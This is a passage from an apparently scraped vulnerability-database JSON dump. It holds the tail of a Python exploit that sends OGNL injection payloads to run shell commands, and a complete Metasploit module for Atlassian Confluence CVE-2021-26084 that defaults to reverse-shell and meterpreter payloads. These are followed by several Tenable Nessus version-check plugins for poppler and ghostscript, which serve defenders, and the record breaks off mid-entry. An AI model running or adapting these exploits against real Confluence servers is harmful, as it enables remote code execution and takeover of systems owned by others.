java.lang.System.getProperty(\\\\u0022os.name\\\\u0022).toLowerCase().contains(\\\\u0022win\\\\u0022); var cmd = new java.lang.String(\\\\u0022\"+cmd+\"\\\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\\\u0022cmd.exe\\\\u0022, \\\\u0022/c\\\\u0022, cmd); } else{p.command(\\\\u0022bash\\\\u0022, \\\\u0022-c\\\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\\\u0022\\\\u0022; var output = \\\\u0022\\\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\\\u0027)}+\\\\u0027\"}\n rawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data)\n\n soup = BeautifulSoup(rawHTML.text, 'html.parser')\n queryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value']\n print(queryStringValue)\n\n\nbanner()\ncmdExec()\n", "sourceHref": "https://0day.today/exploit/36694", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:46:14", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-10T00:00:00", "type": "zdt", "title": "Atlassian Confluence WebWork OGNL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-10T00:00:00", "id": "1337DAY-ID-36730", "href": "https://0day.today/exploit/description/36730", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Atlassian Confluence WebWork OGNL Injection',\n 'Description' => %q{\n This module exploits an OGNL injection in Atlassian Confluence's\n WebWork component to execute commands as the Tomcat user.\n },\n 'Author' => [\n 'Benny Jacob', # Discovery\n 'Jang', # Analysis\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-26084'],\n ['URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html'],\n ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-67940'],\n ['URL', 'https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis'],\n ['URL', 'https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md'],\n ['URL', 'https://testbnull.medium.com/atlassian-confluence-pre-auth-rce-cve-2021-26084-v%C3%A0-c%C3%A2u-chuy%E1%BB%87n-v%E1%BB%81-%C4%91i%E1%BB%83m-m%C3%B9-khi-t%C3%ACm-bug-43ab36b6c455'],\n ['URL', 'https://tradahacking.vn/atlassian-confluence-cve-2021-26084-the-other-side-of-bug-bounty-45ed19c814f6']\n ],\n 'DisclosureDate' => '2021-08-25', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'], # TODO: Windows?\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false, # Tomcat user\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_bash'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8090\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n # /var/atlassian/application-data/confluence/analytics-logs/*.atlassian-analytics.log\n # /var/atlassian/application-data/confluence/logs/atlassian-confluence.log\n IOC_IN_LOGS,\n ARTIFACTS_ON_DISK # CmdStager\n ]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n token1 = rand_text_alphanumeric(8..16)\n token2 = rand_text_alphanumeric(8..16)\n token3 = rand_text_alphanumeric(8..16)\n\n res = inject_ognl(\"#{token1}'+'#{token2}'+'#{token3}\")\n\n return CheckCode::Unknown unless res\n\n unless res.code == 200 && res.body.include?(\"#{token1}#{token2}#{token3}\")\n return CheckCode::Safe('Failed to test OGNL injection.')\n end\n\n CheckCode::Vulnerable('Successfully tested OGNL injection.')\n end\n\n def exploit\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n res = inject_ognl(ognl_payload(cmd))\n\n unless res&.code == 200 && res.body.match?(/queryString.*Process.*pid.*exitValue/)\n fail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\")\n end\n\n vprint_good(\"Successfully executed command: #{cmd}\")\n end\n\n def inject_ognl(ognl)\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/pages/createpage-entervariables.action'),\n 'vars_post' => {\n # https://commons.apache.org/proper/commons-ognl/apidocs/org/apache/commons/ognl/JavaCharStream.html\n # https://github.com/jkuhnert/ognl/blob/f4e18cda6a89bcdad15c617c0d94013a854a1e93/src/main/java/ognl/JavaCharStream.java#L324-L341\n 'queryString' => Rex::Text.to_hex(ognl, '\\\\u00')\n }\n )\n end\n\n def ognl_payload(cmd)\n # https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#expression-language-el---code-execution\n # https://www.tutorialspoint.com/java/lang/class_forname_loader.htm\n # https://docs.oracle.com/javase/7/docs/api/java/lang/ProcessBuilder.html\n # https://docs.oracle.com/javase/8/docs/api/java/util/Base64.Decoder.html\n <<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '')\n '+Class.forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"js\").eval('\n new java.lang.ProcessBuilder(\n \"/bin/bash\",\n \"-c\",\n new java.lang.String(\n java.util.Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(cmd)}\")\n )\n ).start()\n ')+'\n OGNL\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36730", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-09-26T15:47:33", "description": "The Microsoft Open Management Infrastructure service detected on the remote host is affected by a remote code execution vulnerability due to insufficient authentication validation. An unauthenticated, remote attacker can exploit this to execute code on the remote host as root.", "cvss3": {}, "published": "2021-09-20T00:00:00", "type": "nessus", "title": "Microsoft Open Management Infrastructure RCE (CVE-2021-38647)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-38647"], "modified": "2023-09-25T00:00:00", "cpe": ["x-cpe:/a:microsoft:open_management_infrastructure"], "id": "OMI_CVE-2021-38647.NBIN", "href": "https://www.tenable.com/plugins/nessus/153486", "sourceData": "Binary data omi_cve-2021-38647.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:34:38", "description": "The version of poppler installed on the remote host is prior to 21.12.0 / 22.09.0. It is, therefore, affected by a vulnerability as referenced in the SSA:2022-244-01 advisory.\n\n - An integer overflow was addressed with improved input validation. This issue is fixed in Security Update 2021-005 Catalina, iOS 14.8 and iPadOS 14.8, macOS Big Sur 11.6, watchOS 7.6.2. Processing a maliciously crafted PDF may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. (CVE-2021-30860)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-09-01T00:00:00", "type": "nessus", "title": "Slackware Linux 15.0 / current poppler Vulnerability (SSA:2022-244-01)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-30860"], "modified": "2022-09-01T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:poppler", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:15.0"], "id": "SLACKWARE_SSA_2022-244-01.NASL", "href": "https://www.tenable.com/plugins/nessus/164619", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Slackware Security Advisory SSA:2022-244-01. The text\n# itself is copyright (C) Slackware Linux, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(164619);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/09/01\");\n\n script_cve_id(\"CVE-2021-30860\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Slackware Linux 15.0 / current poppler Vulnerability (SSA:2022-244-01)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Slackware Linux host is missing a security update to poppler.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of poppler installed on the remote host is prior to 21.12.0 / 22.09.0. It is, therefore, affected by a\nvulnerability as referenced in the SSA:2022-244-01 advisory.\n\n - An integer overflow was addressed with improved input validation. This issue is fixed in Security Update\n 2021-005 Catalina, iOS 14.8 and iPadOS 14.8, macOS Big Sur 11.6, watchOS 7.6.2. Processing a maliciously\n crafted PDF may lead to arbitrary code execution. Apple is aware of a report that this issue may have been\n actively exploited. (CVE-2021-30860)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the affected poppler package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-30860\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/09/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:poppler\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:15.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Slackware Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\ninclude(\"slackware.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\nvar flag = 0;\nvar constraints = [\n { 'fixed_version' : '21.12.0', 'product' : 'poppler', 'os_name' : 'Slackware Linux', 'os_version' : '15.0', 'service_pack' : '2_slack15.0', 'arch' : 'i586' },\n { 'fixed_version' : '21.12.0', 'product' : 'poppler', 'os_name' : 'Slackware Linux', 'os_version' : '15.0', 'service_pack' : '2_slack15.0', 'arch' : 'x86_64' },\n { 'fixed_version' : '22.09.0', 'product' : 'poppler', 'os_name' : 'Slackware Linux', 'os_version' : 'current', 'service_pack' : '1', 'arch' : 'i586' },\n { 'fixed_version' : '22.09.0', 'product' : 'poppler', 'os_name' : 'Slackware Linux', 'os_version' : 'current', 'service_pack' : '1', 'arch' : 'x86_64' }\n];\n\nforeach constraint (constraints) {\n var pkg_arch = constraint['arch'];\n var arch = NULL;\n if (pkg_arch == \"x86_64\") {\n arch = pkg_arch;\n }\n if (slackware_check(osver:constraint['os_version'],\n arch:arch,\n pkgname:constraint['product'],\n pkgver:constraint['fixed_version'],\n pkgarch:pkg_arch,\n pkgnum:constraint['service_pack'])) flag++;\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : slackware_report_get()\n );\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T15:14:08", "description": "The remote Debian 11 host has packages installed that are affected by a vulnerability as referenced in the dsa-4972 advisory.\n\n - A trivial sandbox (enabled with the `-dSAFER` option) escape flaw was found in the ghostscript interpreter by injecting a specially crafted pipe command. This flaw allows a specially crafted document to execute arbitrary commands on the system in the context of the ghostscript interpreter. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2021-3781)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Debian DSA-4972-1 : ghostscript - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3781"], "modified": "2022-10-04T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:ghostscript", "p-cpe:/a:debian:debian_linux:ghostscript-doc", "p-cpe:/a:debian:debian_linux:ghostscript-x", "p-cpe:/a:debian:debian_linux:libgs-dev", "p-cpe:/a:debian:debian_linux:libgs9", "p-cpe:/a:debian:debian_linux:libgs9-common", "cpe:/o:debian:debian_linux:11.0"], "id": "DEBIAN_DSA-4972.NASL", "href": "https://www.tenable.com/plugins/nessus/153215", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory dsa-4972. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153215);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/10/04\");\n\n script_cve_id(\"CVE-2021-3781\");\n script_xref(name:\"IAVB\", value:\"2021-B-0055-S\");\n\n script_name(english:\"Debian DSA-4972-1 : ghostscript - security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Debian 11 host has packages installed that are affected by a vulnerability as referenced in the dsa-4972\nadvisory.\n\n - A trivial sandbox (enabled with the `-dSAFER` option) escape flaw was found in the ghostscript interpreter\n by injecting a specially crafted pipe command. This flaw allows a specially crafted document to execute\n arbitrary commands on the system in the context of the ghostscript interpreter. The highest threat from\n this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2021-3781)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=994011\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/source-package/ghostscript\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.debian.org/security/2021/dsa-4972\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2021-3781\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/bullseye/ghostscript\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the ghostscript packages.\n\nFor the stable distribution (bullseye), this problem has been fixed in version 9.53.3~dfsg-7+deb11u1.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3781\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ghostscript\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ghostscript-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ghostscript-x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgs-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgs9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgs9-common\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:11.0\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('debian_package.inc');\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar release = get_kb_item('Host/Debian/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Debian');\nvar release = chomp(release);\nif (! preg(pattern:\"^(11)\\.[0-9]+\", string:release)) audit(AUDIT_OS_NOT, 'Debian 11.0', 'Debian ' + release);\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Debian', cpu);\n\nvar pkgs = [\n {'release': '11.0', 'prefix': 'ghostscript', 'reference': '9.53.3~dfsg-7+deb11u1'},\n {'release': '11.0', 'prefix': 'ghostscript-doc', 'reference': '9.53.3~dfsg-7+deb11u1'},\n {'release': '11.0', 'prefix': 'ghostscript-x', 'reference': '9.53.3~dfsg-7+deb11u1'},\n {'release': '11.0', 'prefix': 'libgs-dev', 'reference': '9.53.3~dfsg-7+deb11u1'},\n {'release': '11.0', 'prefix': 'libgs9', 'reference': '9.53.3~dfsg-7+deb11u1'},\n {'release': '11.0', 'prefix': 'libgs9-common', 'reference': '9.53.3~dfsg-7+deb11u1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var release = NULL;\n var prefix = NULL;\n var reference = NULL;\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['prefix'])) prefix = package_array['prefix'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (release && prefix && reference) {\n if (deb_check(release:release, prefix:prefix, reference:reference)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : deb_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = deb_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'ghostscript / ghostscript-doc / ghostscript-x / libgs-dev / libgs9 / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:30:45", "description": "According to the versions of the ghostscript packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - A trivial sandbox (enabled with the `-dSAFER` option) escape flaw was found in the ghostscript interpreter by injecting a specially crafted pipe command. This flaw allows a specially crafted document to execute arbitrary commands on the system in the context of the ghostscript interpreter. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2021-3781)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2022-06-06T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP10 : ghostscript (EulerOS-SA-2022-1804)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3781"], "modified": "2022-09-27T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:ghostscript", "p-cpe:/a:huawei:euleros:ghostscript-help", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2022-1804.NASL", "href": "https://www.tenable.com/plugins/nessus/161849", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(161849);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/09/27\");\n\n script_cve_id(\"CVE-2021-3781\");\n script_xref(name:\"IAVB\", value:\"2021-B-0055-S\");\n\n script_name(english:\"EulerOS 2.0 SP10 : ghostscript (EulerOS-SA-2022-1804)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the ghostscript packages installed, the EulerOS installation on the remote host is affected\nby the following vulnerabilities :\n\n - A trivial sandbox (enabled with the `-dSAFER` option) escape flaw was found in the ghostscript interpreter\n by injecting a specially crafted pipe command. This flaw allows a specially crafted document to execute\n arbitrary commands on the system in the context of the ghostscript interpreter. The highest threat from\n this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2021-3781)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2022-1804\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?374b114c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ghostscript packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3781\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ghostscript\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ghostscript-help\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP10\");\n\nvar sp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(10)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP10\");\n\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP10\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"ghostscript-9.52-4.h3.eulerosv2r10\",\n \"ghostscript-help-9.52-4.h3.eulerosv2r10\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"10\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ghostscript\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T18:30:51", "description": "According to the versions of the ghostscript packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - A trivial sandbox (enabled with the `-dSAFER` option) escape flaw was found in the ghostscript interpreter by injecting a specially crafted pipe command. This flaw allows a specially crafted document to execute arbitrary commands on the system in the context of the ghostscript interpreter. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2021-3781)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2022-06-15T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP9 : ghostscript (EulerOS-SA-2022-1839)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3781"], "modified": "2022-09-27T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:ghostscript", "p-cpe:/a:huawei:euleros:ghostscript-help", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2022-1839.NASL", "href": "https://www.tenable.com/plugins/nessus/162278", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162278);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/09/27\");\n\n script_cve_id(\"CVE-2021-3781\");\n 